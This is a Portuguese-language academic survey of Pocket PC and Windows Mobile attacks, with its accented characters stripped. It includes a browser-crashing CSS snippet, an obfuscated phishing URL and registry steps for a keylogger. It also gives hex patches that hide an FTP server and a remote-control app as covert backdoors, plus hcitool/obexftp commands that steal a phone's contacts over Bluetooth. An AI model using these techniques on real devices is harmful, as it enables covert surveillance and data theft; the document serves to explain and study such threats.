    No mundo dos PCs, o Internet Explorer alvo de muitas aplicaes contendo cdigo

    malicioso que desejam explorar vulnerabilidades de segurana neste software (exploits).

    Felizmente, muitos destes ataques no so possveis contra Pocket PCs porque o Pocket Internet

    Explorer (Pocket IE) uma verso muito mais simples quando comparado a seu pai. No

    entanto, este fato no significa que o PIE est livre de potenciais ataques. A seguir, descrevemos

    uma srie de mtodos que podem ser usados para atac-lo:

    Negao de servio (DoS Denial of Service)

    Apesar do PIE portar uma verso tambm simplificada do interpretador de JavaScript,

    ainda possvel criar uma certa quantidade de ataques baseados em scripts que iro forar o

    usurio a reiniciar seu PDA. Alm destes, existem outros problemas que podem causar a

    finalizao imediata do PIE. Por exemplo, uma das falhas do software existe na maneira em que

    ele verifica listas em HTML que usam formatao CSS (Cascading Style Sheets), ilustrado a seguir:

    #layer1 div.sublayer1 { width:50%; margin:0 1 2 3; padding:4; float:right; } #layer1 div.sublayer2 { width:50%; margin:0 1 2 3; padding:4; float:right; } 111 222

    Figura 4: Cdigo em HTML que ir finalizar imediatamente o Pocket Internet Explorer

    2.1.6. Viso reduzida de URLs

    H muitos anos atrs, foi descoberto que o Internet Explorer processava endereos

    contendo caracteres codificados com Unicode. Quando esta falha era combinada com requisies

    HTTP do tipo usuario:senha@dominio, era possvel enganar pessoas fazendo-as achar que

    estavam acessando links vlidos. No entanto, estas eram direcionadas a pginas falsas. Dado o

    tamanho limitado da barra de endereos do PIE, fcil imaginar que algum no iria suspeitar

  • 17

    que foi vtima deste tipo de ataque. Por exemplo, o link a seguir ir direcion-lo a

    www.airscanner.com, ao invs de www.puc-rio.br.

    http://www.puc-rio.br&login.rand-%00%01AE67D12EF9090AB933@%36%39%2E%30%2E%32%30%30%2E%31%30%36/

    2.1.7. Modelo de Objeto de Domnio do PIE (PIE Domain Object Model)

    Janelas e divises (frames) sempre foram muito usadas por desenvolvedores de

    aplicaes web para apresentar diversas pginas em um mesmo contexto de visualizao. O ponto

    que gostaramos de ressaltar que o cdigo presente em uma janela no pode enxergar ou

    modificar o cdigo presente em outra. A razo para isso que um atacante poderia esconder uma

    janela com cdigo malicioso e tentar induzir o usurio e fornecer informaes confidenciais. A

    seguir, ilustramos uma maneira de explorar este tipo de situao:

    Note que a URL que aparentemente est sendo acessada (johnny.ihackstuff.com) est na

    verdade apontando para uma pgina em outro servidor Web. Quando acessada, o contedo da

    pgina alterado pelo cdigo no exibido devido ao pequeno tamanho da barra:

    Figura 5: barra de endereos reduzida pode enganar usurios

    2.1.8. Acesso a arquivos locais usando o Pocket IE

    Outro recurso a possibilidade de acesso a arquivos locais usando o Pocket Internet

    Explorer. Combinando este artifcio com o problema citado anteriormente de execuo de

  • 18

    cdigo em frames ocultas, temos um verdadeiro risco de segurana. A seguir, listamos apenas

    uma pequena quantidade de tipos de arquivos que podem ser carregados atravs de um frame e

    aberto com o PIE:

    XLS

    HTC, HTP

    CPL (itens do painel de controle)

    INI

    Imagens 2BP

    Acesso qualquer pasta

    Acesso pasta raiz

    Um vetor potencial encontrado o fato do PIE permitir a visualizao de pginas

    previamente acessadas, armazenadas em cache, e que podem ser posteriormente modificadas

    devido uma frame oculta. Por exemplo, seria fcil obter o cache de acesso pgina da PUC-

    RIO, alterar o cdigo no que diz respeito s propriedades de formulrios, direcionando o envio

    das informaes preenchidas para um servidor web nocivo, o que iria capturar usurios e senhas

    quando o boto Enviar fosse pressionado.

    2.1.9. Monitorao de teclas digitadas

    O mundo dos PCs j est alerta quanto infeco de leitores de teclado (keyloggers),

    pois h tempo so usados em ataques. No entanto, quando voltamos ao mundo dos Pocket PCs,

    no se tem dado a mesma importncia ou considerado que a probabilidade de existncia deste

    tipo de malware tambm existe. Provavelmente, pois o conceito de teclado em um dispositivo

    mvel bem diferente do existente em PCs.

    Ao invs de um dispositivo fsico, o Pocket PC usa uma interface virtual que simula teclas

    reais. Mesmo que isso dificulte a captura de teclas digitadas, de jeito nenhum isso se tornou

    impossvel. Quando o PDA iniciado, primeiro ele avalia o registro do sistema e busca quaisquer

    dispositivos de entrada. Por padro, so eles: o teclado, o Block Recognizer, Letter

    Recognizer e o Transcriber. Cada um destes controlado por uma biblioteca dinmica (DLL)

    presente em memria ROM, que possui tanto a interface grfica quanto o cdigo de converso da

    entrada para caracteres. Por exemplo, o teclado principal controlado pela biblioteca MSIM.DLL.

    Graas arquitetura dos painis de entrada, relativamente fcil criar um novo teclado

    e instal-lo no sistema. Na verdade, existem diversas verses de teclado que podem ser obtidas e

    incorporadas ao sistema. Com base nisso, pode-se criar uma verso especial de teclado, com

    uma pitada adicional de cdigo, que captura a entrada digitada e armazena-a em um arquivo

    texto. Depois disso, descobrimos quais seriam as entradas de registro necessrias para

    removermos a ligao com o teclado atual e as substiturmos por outras que chamaro o novo

  • 19

    teclado. Para finalizar, criamos um pacote .CAB contendo todas as nossas invenes; quando

    executado, substitui o teclado original por um idntico, porm registrando cada tecla digitada.

    A seguir, listamos as chaves de registro a serem alteradas para que a infeco seja bem sucedida:

    1. IsSIPInputMethod desabilitada para o teclado original: CLSID: 42429667-ae04-11d0-a4f8-00aa00a749b9 (Trocar de 1 para 0)

    2. Nome e cone Keyboard carregado da dll keylogger.dll 3. Novo teclado possui possui o prprio CLSID configurado 4. HKCU\ControlPanel\SIP\DefaultIM\{CLSID} 5. IsSIPInputMethod habilitado para o teclado falso

    Uma vez instalado, o usurio final no ter idia de que seu teclado foi substitudo por

    um modelo mais avanado. Alm disso, a nica maneira de se descobrir que uma nova DLL est

    sendo chamada pelo sistema atravs de depurao dos executveis responsveis pela gerncia

    do teclado ou outro perifrico usado pelo PDA.

    2.1.10. Anlise forense

    Os PDAs em geral possuem uma capacidade de armazenamento de dados muito limitada

    (excluindo os cartes de memria que podem chegar a alguns GBs). Desta forma, se h

    necessidade de acesso realmente rpido, deve-se transferir estes dados a um PC. Ou ento, faz-

    se uso de uma poderosa ferramenta de anlise forense, isto , uma ferramenta de visualizao

    exata dos dados presentes na RAM e na ROM (dumper).

    A comunidade policial comeou recentemente a levar em conta PDAs encontrados em

    cenas de crime. Para ajudar, foram criados diversos programas de anlise forense que podem

    encurtar o caminho de busca por informaes interessantes. Por exemplo, a empresa Paraben

    [29] criou um software que instala um agente temporrio em um PDA, que automaticamente

    transfere todo o contedo do mesmo para um PC, mantendo a integridade de ambos. Outras

    ferramentas fazem uso do recurso de execuo automtica mencionado anteriormente,

    carregando todo o contedo do PDA para um carto de memria SD (Secure Digital Card) fazendo

    uso do recurso de autorun.

    Isso significa que basta um perodo curto de tempo em mos erradas para todos os dados

    de um PDA serem roubados.

    2.1.11. Engenharia reversa de binrios

    A plataforma Windows Mobile para Pocket PCs tipicamente executada sob um

    processador ARM (Advanced RISC Multiprocessor), conhecido por baixo aquecimento, por operar

    em baixo nvel de potncia e consumo de energia. Este fato, combinado com o reduzido nmero

    de instrues disponveis (RISC Reduced Instruction Set) faz com que aprender e entender o

  • 20

    conjunto de instrues seja relativamente fcil, principlamente quando comparado a outros

    processadores.

    A primeira coisa que deve ser entendida ao se aplicar engenharia reversa a um arquivo

    binrio como o seu processador funciona. Em geral, este ir ler os cdigos de operao

    (opcodes) em algum lugar especfico na memria (indicado pelo registrador PC program

    counter), e executar um comando bastante especfico. Dependendo da instruo, o processador

    ir somar, subtrair, saltar para outra parte da memria ou simplesmente no fazer nada (NOP).

    Para ajudar o trabalho do processador, existem 32 registradores de 1 byte cada, totalizando 8

    bytes de memria auxiliar. Tais registradores tm apenas a funo de agilizar o trabalho do

    processador, pois o acesso a estes registradores muito rpido, ao contrrio do que acontece

    quando o acesso realizado na RAM.

    Para realmente explorar os binrios de um PocketPC, sero necessrios alguns programas.

    Primeiro, um desassemblador (disassembler) para converter o cdigo hexadecimal para um

    formato mais legvel, formado por instrues de operao (opcodes). Um bom exemplo deste tipo

    de aplicao o IDA Pro, o qual suporta binrios do Windows CE. Em segundo, usamos o

    depurador de cdigo includo no conjunto de ferramentas de desenvolvimento para Windows CE

    da Microsoft (CE++). Este ltimo necessrio para observar e alterar o cdigo do binrio em

    tempo de execuo. Por ltimo, ser necessrio um editor hexadecimal para alterar o cdigo

    para realizao de testes no sistema. A ferramenta sugerida a UltraEdit, mas existem

    diversas opes.

    Tendo estas ferramentas reunidas, pode-se passear pelo Windows Mobile, observando

    cuidadosamente o que est acontecendo. A nica coisa que resta nesta estria a necessidade

    de se entender as instrues realizadas pelo processador. Em outras palavras, de muita

    utilidade entender o assembly do ARM. Felizmente, entendendo as seguintes intrues, possvel

    ler e at mesmo escrever rotinas em assembly que podero ser executadas em um Pocket PC:

    MOV (Mover) Copia o valor de um registrador para outro, podendo ser o destino da cpia

    um registrador fixo (hardcoded) ou no.

    CMP (Comparar) Compara o valor de um registrador com outro.

    B (Branch) altera o fluxo de execuo do programa, apontando para outro endereo de

    memria

    BL (Branch Link) - altera o fluxo de execuo do programa, apontando para outro

    endereo de memria e depois retorna para posio inicial.

  • 21

    LDR/STR (Load Register / Store Register) Armazena ou carrega um dado para ou da RAM

    em um dos registradores.

    Existem outros opcodes no mencionados aqui. Para maiores informaes quanto ao

    assembly de processadores ARM, sugerimos uma visita www.arm.com e a pesquisa nos

    manuais dos processadores.

    2.1.12. Servidor de FTP oculto

    Uma vez entendido como funciona um programa em baixo nvel, pode-se fazer qualquer

    coisa para alterar as suas funcionalidades. Neste caso, foi possvel transformar um legtimo

    servidor FTP em uma porta de entrada invisvel e indetectvel.

    Figura 6: servidor de FTP identifica-se atravs de cone na rea de trabalho

    Para isso, primeiramente localizamos o trecho de cdigo responsvel pela exibio do

    cone na barra de tarefas. Graas ao recurso de listagem de nomes de funo do IDA Pro,

    detectamos uma delas chamada Shell_NotifyIcon. Depois de encontrada, o seu cdigo foi

    alterado da seguinte forma:

    MOV Shell_NotifyIcon para MOV R0, R03A 01 00 EB para 00 00 A0 E1

    O lado esquerdo mostra o comando original, seguido dos valores em hexadecimal

    originais. Para impedir a exibio do cone, o cdigo foi alterado para que o programa no

    realizasse nenhuma operao (Na verdade foi alterado para realizar um NOP virtual, fazendo com

    que o contedo de R0 fosse copiado para o prprio R0).

  • 22

    A porta padro tambm foi alterada de 21 para uma de valor mais alto, que

    provavelmente no chamaria muito a ateno. Esta alterao to fcil quando localizar o valor

    absoluto da porta em questo e alter-lo para o de preferncia.

    2.1.13. Controle remoto

    Para o prximo exemplo, encontramos uma aplicao que nos permite acessar

    remotamente um dispositivo executando Windows Mobile: vRemote. Neste caso, o programa

    exibie uma janela sempre que iniciado, o que alerta o usurio de sua presena, o que queremos

    retirar.

    Figura 7: Janela exibida ao iniciar a aplicao VirtualCE

    A seguir mostramos as alteraes feitas na aplicao para remover completamente

    qualquer sinal visual indicador da presena do vRemote sendo executado.

    BL ShowWindow para MOV R0, R0 (Virtual NOP) A6 15 00 EB para 00 00 A0 E1

    Novamente, fomos capazes de fazer tais alteraes fazendo uso do IDA Pro e tendo

    como alvo a funo ShowWindow, sobreescrevendo-a com um trecho de cdigo com NOP e mais

    duas outras partes que faziam referencia a esta funo.

    A questo destes exemplos que aplicaes comuns para Windows Mobile podem ser

    facilmente modificadas. Mais informaes sobre alterao de aplicao em baixo nvel podem ser

    encontradas no livro Aggressive Network Self Defense. O primeiro captulo do livro entra em

  • 23

    detalhes sobre como duas pessoas, cada uma portando seu Pocket Pc, podem travar uma batalha

    digital atravs de modificaes de cdigo em baixo nvel.

    2.2. Descrio de ameaas especficas

    O Windows Mobile ainda no atraiu muita ateno no que diz respeito verses

    publicamente conhecidas de vrus e cavalos de tria. At Agosto de 2005, somente duas

    aplicaes maliciosas criadas para Windows Mobile foram identificadas. Apesar deste nmero ser

    pequeno, a sofisticao tecnolgica empregada grande, como descrito a seguir.

    3. Ataques atravs da Rede A plataforma Windows Mobile foi desenvolvida para dispositivos operados em redes sem-fio. E

    tambm vulnervel a muitas das ameaas que existem para o mundo dos PCs. A seguir,

    descrevemos uma srie de ataques que podem ser feitos contra um PDA localizado em uma rede

    sem-fio sem que haja prvia manipulao direta do dispositivo.

    3.1. Classificao geral de tipos de ataques

    3.1.1. Formas de ataques genricas

    Os PDAs geralmente usam um adaptador de rede sem fio com baixo consumo de energia.

    A partir de ento, pode-se acessar a Web, e-mails, etc. Considerando que o equipamento

    trabalha com baixas taxas de consumo de energia, a intensidade do sinal wireless utilizado

    tambm baixa. Sendo assim, relativamente fcil provocar um nvel de interferncia

    (utilizando um Acess Point ou at mesmo um laptop) suficiente para impedir que o dispositivo

    possa se conectar ao local correto, mas induzindo-o a se conectar em um ponto de acesso mal-

    intensionado (rogue access point).

    Alm disso, algumas vezes possvel realizar um ataque de negao de servio do tipo

    ping DoS, que ir consumir todos os recursos disponveis do PDA, fazendo com que fique

    extremamente lento, impraticvel de se trabalhar.

    Por final, pode-se tambm atacar servios em PCs, por exemplo o Active Sync* na porta

    901, o que ir impedir que um PDA associado possa se conectar.

  • 24

    3.1.2. Quebra de chave da criptografia

    Atualmente, diversas tecnologias de criptografia so empregadas para proteo dos dados

    trafegados nas redes sem fio. No incio, na maioria dos casos nenhuma criptografia era utilizada,

    sendo possvel para qualquer pessoa nas proximidades da rede observar o trfego em texto puro

    (incluindo credenciais de usurios, mensagens de correio eletrnico, etc). A questo evoluiu para

    um sistema de criptografia fraco, chamado WEP (Wired Equivalent Privacy), burlada pouco tempo

    depois de seu lanamento, devido sua chave ser esttica e de tamanho reduzido.

    Atualmente, os sistemas de autenticao j adquiriram uma maturidade aceitvel,

    fazendo uso de certificados digitais como mtodo de autenticao e chaves de criptografia

    dinmicas. Os ataques de quebra de chave de criptografia pretendem burlar tais sistema, de

    modo a capturar o trfego de forma no criptografada.

    3.1.3. Tomada de controle do dispositivo

    A literal invaso de dispositivos mveis significa a tomada de controle do equipamento,

    de forma a utiliz-lo remotamente como se fosse de forma local. Diferentes nveis de acesso

    podem ser obtidos, de acordo com a porta de entrada utilizada. Esta ltima pode ser uma porta

    dos fundos instalada atravs de um cavalo de tria ou at mesmo atravs da explorao de uma

    vulnerabilidade crtica em alguma aplicao. Pode-se dizer que este tipo de ataque o mais

    perigoso, pois pode oferecer controle completo do sistema.

    3.1.4. Pontos de acesso falsos

    Uma das formas mais prticas para se obter credenciais de usurios, induz-los a

    tentaram efetuar uma conexo sem fio e se autenticar em um ponto de acesso falso (chamados

    na literatura de rogue access points). O usurio descuidado ir identificar um ponto de acesso

    com o mesmo nome da rede que est acostumado a usar e rapidamente tem as suas credenciais

    capturadas. Existem ferramentas que emitem beacons (pacotes transmitidos para notificar os

    usurios da presena de uma rede sem fio) simulando a existncia de diversas redes, confundindo

    usurios e at mesmo wardrivers (atacantes que circundam reas buscando redes sem fio de

    interesse). Este tipo de ataque se aplica s tecnologias 802.11 e Bluetooth, mas principalmente

    802.11.

  • 25

    3.1.5. Viso geral de worms/virus conhecidos

    A partir do final de 2005, virii disseminveis por redes sem fio cresceram num ritmo

    grande em nmero e sofisticao. Como exemplo, o primeiro vrus para Pocket PC (Dust) a

    aparecer era incrivelmente complexo. Tinha uma tecnologia de penetrao equivalente ao vrus

    Chernobyl Win32, que foi o primeiro vrus para PCs a quebrar o Anel 0, protegido pelo sistema

    operacional Windows.

    Alm disso, menos de um ano depois do Dust, inmeras ameaas foram identificadas. Por

    exemplo, criadores de vrus tm desenvolvido trojans e tm os combinado com a capacidade de

    propagao do vrus Carib (Cabir) via Bluetooth. Em um ano, houve uma evoluo de vrus

    equivalente aos 20 anos que levou para PCs.

    O problema devido rpida evoluo de ameaas o fato de que os dispositivos mveis

    atuais no suportam softwares de antivrus sofisticados nas plataformas correntes. Por exemplo,

    sistemas operacionais embutidos no usam interrupes (chamadas de sistema para o kernel),

    ento uma heurstica de vrus no PDA ou Smartphone no pode bloquear uma interrupo

    especfica caso haja suspeita de vrus.

    Outro problema a aparncia enganosa e obsoleta da indstria de antivrus. A velha

    proteo desta, freqentemente opera atravs de um princpio antiquado de segurana atravs

    da incerteza.

    O Trojan Brador

    O Brador foi o primeiro trojan para Pocket PC. Ele d total controle remoto do dispositivo

    a um hacker que pode estar at do outro lado do mundo. Isso um problema principalmentepara

    executivos ou administradores de rede que, como muitos outros, usam o Pocket PC para controlar

    toda a infraestrutura da empresa.

    O Brador um sucesso em parte, pois o sistema operacional do Pocket PC no vem com

    um monitor de processos nativo. Sem um monitor de processos, difcil identificar e remover

    trojans. No Pocket PC falta esse recurso e quando um usurio tenta apagar o arquivo malicioso, o

    sistema apresenta uma mensagem de erro dizendo que o programa est em uso. Neste caso, o

    nico jeito de remover o trojan seria realizando o reset de fbrica do sistema. Felizmente,

    existem ferramentas apropriadas que fazem isso sem a necessidade da restaurao completa.

  • 26

    3.2. Ataques via interface Bluetooth

    Ataques via bluetooth tem sido destaque j h algum tempo. No entanto, quando se

    chega mais perto para analis-los, percebe-se que em sua grande maioria os alvos so telefones

    celulares, no PDAs. Apesar disso, existem alguns problemas que devem ser endereados.

    importante ressaltar que estes problemas podem ou no estar presentes no seu equipamento,

    dependendo da implementao da tecnologia empregada pelo fabricante do mesmo.

    O primeiro ataque chamado bluejacking, o que no nada alm do envio de

    mensagens para um dispositivo mvel com a interface bluetooth habilitada. O prximo problema

    que pode afetar usurios de PDAs so os ataques de negao de servio via bluetooth. Uma das

    formas de faz-lo enviando um pacote do tipo ping para o dispositivo, que poder alocar os

    recursos, fazendo com que ningum mais possa se conectar. Existem outros ataques que podem

    desabilitar ou tirar servios de operao.

    PIN cracking a ltima forma de ataque que mencionamos. Como o BlueTooth

    protegido por uma senha de apenas 4 dgitos (PIN personal identification number), torna-se

    fcil realizar um ataque de fora bruta e descobr-la. Normalmente isso pode ser conseguido em

    algumas horas, dependendo de quantos clientes esto atacando o alvo. possvel tambm

    encontrar dispositivos ocultos atravs de fora bruta aplicada a endereos fsicos (MAC addresses)

    de interfaces de rede bluetooth.

    3.2.1. Varrendo endereos Bluetooth

    O endereo MAC Bluetooth uma seqncia de 6 bytes que identifica o dispositivo. Os

    primeiros 3 bytes so atribudos pelo IEEE e identificam o fabricante do equipamento. Os ltimos

    3 bytes so atribudos pelo prprio fabricante.

    Em teoria, habilitar o modo invisvel deveria proteger os usurios de conexes no

    autorizadas. Na prtica, mesmo assim ainda possvel localizar tais dispositivos. Existem

    ferramentas, por exemplo, que realizam ataques de fora bruta em busca de dispositivos

    invisveis. Uma dessas ferramentas o "RedFang"[31], criada por Ollie Whitehouse [9], que tenta

    se conectar a todos os endereos fsicos possveis, at que receba respostas para tais tentativas

    de conexo. Na verdade, esta ferramenta mais uma prova de conceito do que de fato uma

    ferramenta de hacking. O principal obstculo na verdade o tempo necessrio para se realizar o

    ataque, pois a verificao de apenas um dispositivo leva de 2.5 a 10 segundos em mdia.

    Para se ter uma noo melhor, temos que o espao de endereamento da Sony Ericsson

    [10] comporta 16.777.216 possveis endereos. Se assumirmos que a verificao de cada

    dispositivo leva 6 segundos, a varredura total levar 1165 dias, o que significa que levaria trs

    anos para encontrar todos os dispositivos da Sony Ericsson [10] escondidos em uma sala. Percebe-

  • 27

    se, assim, que no esta uma forma efetiva de se obter tais informaes. Exatamente por isso

    foram criadas novas tcnicas, que realizam o mesmo servio de forma muito mais eficiente.

    3.2.2. Reduzindo a margem de endereos possveis

    Em primeiro lugar, caso o fabricante seja conhecido, o nmero de endereos possves

    imediatamente limitado a 16.777.216 alternativas. Alm disso, alguns dispositivos Bluetooth

    costumam utilizar faixas de endereos mais previsveis, de acordo com o modelo. Por exemplo, o

    endereo da maioria dos celulares Sony Ericsson P900 [10] comea com os seguintes sete dgitos

    hexa "00:0A:D9:E", o que significa que restam somente cinco dgitos hexadecimal para serem

    descobertos. Esta informao reduz a busca de mais de 16 milhes de endereos para apenas

    1.048.576 possibilidades! Alm disso, o quarto byte do endereo costuma estar na faixa "E7-EE", o

    que reduz ainda mais o nmero de possibilidades para 524.288. Com isso, o ataque de fora bruta

    levaria 36 dias, que apesar de j ser absurdamente menor, mesmo assim no prtico.

    O tempo necessrio para realizar a varredura no s pode ser diminudo pela reduo das

    faixas de endereamento, mas tambm pela acelerao do processo de varredura. A verso atual

    do "RedFang" [31] permite a distribuio do trabalho da varredura entre diferentes dispositivos.

    Se usarmos oito dispositivos para isso, reduzimos o tempo total da busca por celulares Sony

    Ericsson [10] para quatro dias e meio. Apesar deste tempo ser relativamente alto, pode-se

    esperar a reduo deste tempo atravs de tcnicas mais avanadas.

    3.2.3. Descobrindo endereos Bluetooth enquanto se comunicam

    Endereos MAC Bluetooth podem ser descobertos observando o trfego de comunicao

    entre dispositivos, pois o endereo em si no criptografado mesmo que o usurio utilize

    criptografia.

    Este um dos principais problemas com a especificao do Bluetooth. O chaveamento de

    freqncia em uso pelos dispositivos que ocorre 1600 vezes por segundo fornece uma proteo

    bsica ao trfego no criptografado. No entanto, o chaveamento de freqncias ocorre de forma

    pseudo-randmica, o que significa que um hacker com as ferramentas necessrias poderia

    sincronizar com um padro pr-definido de chaveamento entre dois dispositivos em comunicao.

    Alm disso, a seqncia usada no chaveamento compartilhada para todos os membros da

    mesma piconet (rede de dispositivos BlueTooth), o que d boa vantagem ao hacker. Na verdade,

    j existem equipamentos no mercado que so capazes de capturar trfego Bluetooth com grande

    facilidade e analis-lo, mas ainda custa muito caro (em torno de U$ 10.000), o que dificulta a

    aquisio para a maioria dos hackers.

    Os hackers podem tirar proveito de pessoas descuidadas que deixam seus telefones no

    modo visvel. s vezes, necessrio deix-los temporariamente no modo visvel para fazer o

  • 28

    primeiro contato com um novo dispositivo - pairing, descrito mais a frente. Esta necessidade de

    tornar o dispositivo visvel uma grande vantagem para os hackers, pois podem se aproveitar

    deste curto espao de tempo quando os dispositivos se tornam visveis e at mesmo de

    esquecimentos de revert-los para o modo invisvel. Quando visvel, os hackers podem descobrir o

    endereo do dispositivo instantaneamente. Nenhum dos celulares com Bluetooth do mercado

    permitem a entrada manual de um endereo para a realizao de sincronizao com outro

    dispositivo (pairing), o que significa que obrigatoriamente o celular deve ficar em modo visvel

    para ser encontrado e realizar a comunicao. Como o endereo do dispositivo nico e

    imutvel, basta o atacante descobr-lo somente uma vez. Ou seja, basta que o dispositivo fique

    visvel por um curto espao de tempo para o hacker descobrir seu endereo, e mesmo que

    retorne ao modo invisvel, o atacante poder se conectar, sem que seu dono possa negar esta

    conexo. Isso acontece, pois um dispositivo Bluetooth nunca nega uma conexo bsica L2CAP. Os

    dispositivos atuais no bloqueam esse tipo de conexo por se tratar de uma conexo de baixo

    nvel, no existe ainda esta funcionalidade, nem mesmo bloqueio por endereos. Por padro, no

    existe um firewall para Bluetooth.

    3.2.4. Comunicao via Bluetooth entre dispositivos & segurana

    Umas das principais funes que envolve segurana de Bluetooth a comunicao entre

    dois dispositivos (pairing). Por padro, a comunicao no autenticada, e praticamente

    qualquer dispositivo pode se conectar a qualquer outro. No entanto, para acessar determinadas

    funes como transferncias de arquivos, normalmente exigi-se uma autenticao, baseada em

    uma chave simtrica, cadastrada em ambos os dispositivos (PIN codes ou passkeys).

  • 29

    Figura 8: Exemplo de configurao da autenticao de uma configurao Bluetooth.

    Uma vez esta chave cadastrada, gerada uma chave de sesso, que armazenada na

    memria e possibilitar a comunicao entre estes mesmos dispositivos no futuro sem passar por

    esta fase de autenticao novamente.

    3.2.5. Problemas relacionados a fabricantes

    Infelizmente para os usurios de dispositivos Bluetooth, o processo de autenticao e

    autorizao para acessar servios no corretamente implementado pelos desenvolvedores.

    Estas fraquezas j afetam alguns aparelhos e permitem o roubo de agendas de telefone,

    informaes de calendrio, fotos e at mesmo a efetuao de ligaes telefnicas ou envio de

    SMS a partir do dispositivo atacado. Tudo devido falta de controle de acesso adequada.

    Apenas para ilustrar o perigo potencial, imagine que algum tomou o controle do telefone

    celular de um indivduo e envia uma mensagem de SMS para a polcia com uma ameaa.

    Automaticamente a polcia ir identificar o nome a que est associado linha telefnica de

    origem, chegando facilmente ao dono do aparelho invadido. O indivduo culpado ter ainda

    bastante dificuldade de provar que nada fez, pois normalmente no h registro das conexes via

    Bluetooth.

    A vulnerabilidade de segurana mencionada facilmente explorada e no requer

    nenhuma habilidade especial. Apenas dois comandos comuns so necessrios para roubar uma

    agenda telefnica de um aparelho T610:

  • 30

    # hcitool scan

    Scanning .

    00:0A:D9:15:0B:1C T610-phone

    # obexftp -b 00:0A:D9:15:0B:1C --channel 10 -g telecom/pb.vcf -v

    Browsing 00:0A:D9:15:0B:1C ...

    Channel: 7

    No custom transport

    Connecting...bt: 1

    done

    Receiving telecom/pb.vcf...\done

    Disconnecting...done

    Isso tudo o que se faz necessrio para roubar informaes de um aparelho T610

    inseguro. Ambos os commandos hcitool e obexftp so comandos tpicos de Bluetooth,

    disponveis em qualquer distribuio Linux [12] com o pacote de expanso Bluetooh.

    Esta vulnerabilidade foi descoberta por Adam Laurie [26] e afeta diversos dispositivos,

    incluindo: Nokia [27] 6310, 6310i, 8910, 8910i, Sony Ericsson [10] T68, T68i, R520m, T610, Z600 e

    possivelmente outros. Foi profundamente estudada pelo grupo trifinite, que inclusive

    desenvolveu uma aplicao chamada Blooover, que explora a vulnerabilidade.

    No uma surpresa que alguns usurios menos experientes destes dispositivos, por

    exemplo, aqueles que s precisam fazer ligaes ou enviar mensagens de testo, tenham

    conhecimento de que seus aparelhos celulares precisam receber atualizaes de software. mais

    incrvel ainda observar que dispositivos com falhas to srias podem estar ainda no mercado.

    Qualquer auditoria de segurana na fase de testes do sistema operacional (antes de disponibilizar

    no mercado) deveria apresentar tais resultados. Ou seja, fica claro que alguns fabricantes destes

    dispositivos no se importam muito com a segurana, o que traz uma espectativa de que o

    nmero de falhas de segurana cresa ainda mais no futuro.

    3.2.6. O Risco de conexo APs falsos

    O procedimento de sincronizao de dispositivos apresenta mais um risco. A lista de

    dispositivos descobertos apresenta somente seu nome, e no seu endereo Bluetooth.

  • 31

    Figura 9: A descoberta de dispositivos no divulga seu endereo Bluetooth

    Como o dispositivo tem um nome, ele pode ser facilmente modificado pelos usurios.

    Portanto, no deveria ser usado como um identificador nico do dispositivo no processo de

    sincronizao; O endereo Bluetooth realmente deveria ser comparado para verificaes

    complementares.

    Este pequeno detalhe poderia ser explorado de diversas maneiras, especialmente em

    servios oferecidos publicamente atravs de Bluetooth. Por exemplo, um Ponto de Acesso (Access

    Point AP) poderia ser substitudo por outro com fins maliciosos, porm com o mesmo nome e

    aceitando as mesmas informaes de autenticao dos usurios. No entanto, todas as

    informaes que passarem por ele sero capturadas e analisadas, em busca de senhas e

    informaes sigilosas.

    Este ataque tambm pode ser executado de forma alternativa. Em muitos lugares

    pblicos, existem quiosques destinados propaganda de produtos, e muitas vezes oferecendo

    contedo via Bluetooth, como, por exemplo, toques para celular e jogos.

    No caso, quando o usurio selecionou o contedo a ser copiado, automaticamente o nome

    do dispositivo do transmissor deste contedo inserido na lista de contatos. O problema que o

    dispositivo que se intitula MOBILE-KIOSK", no necessariamente quem diz ser. Tal visitante

    poderia ser um hacker que alterou o nome de seu notebook para MOBILE-KIOSK". Certamente,

    estes ataques poderiam ser evitados caso o processo de autenticao fosse melhor

    implementado, pois atualmente so implementados de forma pobre e as senhas normalmente so

    estticas (ou seja, no existe uma poltica de alterao de senhas periodicamente).

  • 32

    3.2.7. Ataques especficos

    Bluejacking - Consiste no envio de mensagens, inclusive spam, para dispositivos eletrnicos

    alheios via bluetooth. A tcnica surgiu inocentemente, quando um usurio identificou nas

    proximidades um telemvel Nokia [27] com Bluetooth ativo e enviou, por diverso, uma

    mensagem que dizia "Compre Ericsson. Empresas de marketing levaram o conceito adiante e

    criaram o Bluecasting, em que um equipamento especial dispara propaganda para todos os

    aparelhos que passam perto. A prtica classificada como spam e proibida em muitos pases.

    Bluesnarfing Consiste em roubo das informaes dos aparelhos alheios. Basta que o dispositivo

    (s os modelos mais antigos so vulnerveis) esteja com o Bluetooth ativado e em modo visvel

    para que uma pessoa mal-intencionada nas proximidades possa invad-lo e roubar o contedo da

    agenda e catlogo de endereos, por exemplo.

    Bluetooth Sniping - Embora o alcance tpico de um dispositivo Bluetooth seja de 10m e de um

    laptop possa chegar a 100m, um grupo de pesquisa em aplicaes sem fio, construiu um rifle

    bluetooth capaz de captar sinais de dispositivos localizados a mais de 1 km. Apesar da aparncia

    ameaadora, o equipamento apenas um transmissor/receptor de alta potncia acoplado a uma

    antena direcional que deve ser apontada para o alvo. Um micro porttil recebe os sinais da

    antena e mostra as identificaes dos aparelhos bluetooth, abrindo caminho para aes de

    Bluejacking e Bluesnarfing. Durante os testes do equipamento em Los Angeles, o grupo conseguiu

    encontrar dezenas de aparelhos Bluetooth em minutos, simplesmente apontando a arma para

    prdios comerciais ao redor. A brincadeira recebeu o nome de Bluetooth Sniping.

    Ataques de SMS - Uma vulnerabilidade em potencial do SMS permitir que um dispositivo receba

    ou envie uma mensagem a qualquer momento, independente se uma ligao de voz ou dado

    esteja em andamento. Se o dispositivo estiver indisponvel, a mensagem ser armazenada no

    servidor central. O servidor, ento, ir tentar retransmitir a mensagem at que possa entregar a

    mensagem.

    De fato, h ferramentas que so usadas para inundar servios de SMS. O mesmo princpio

    destas, quando unido com o poder de replicao de um vrus, pode potencialmente resultar em

    ataques de Negao de Servio em ampla escala. Outro exemplo de uma inundao de vrus de

    SMS que ocorreu na Escandinvia. Quando um usurio recebia uma mensagem, o vrus bloqueava

    os botes do dispositivo, o que se tornou um ataque de Negao de Servio contra todo o

    sistema. De maneira semelhante, uma empresa norueguesa encontrou um outro exemplo de

    cdigo malicioso. Eles encontraram um certo SMS que congelava telefones que recebiam esta

    mensagem. O cdigo impedia o uso do teclado logo que o SMS era recebido.

  • 33

    Carib (Caribe, Cabir)

    Primeiro vrus conhecido para Bluetooth, alvo de telefones mveis. Mesmo o prprio vrus

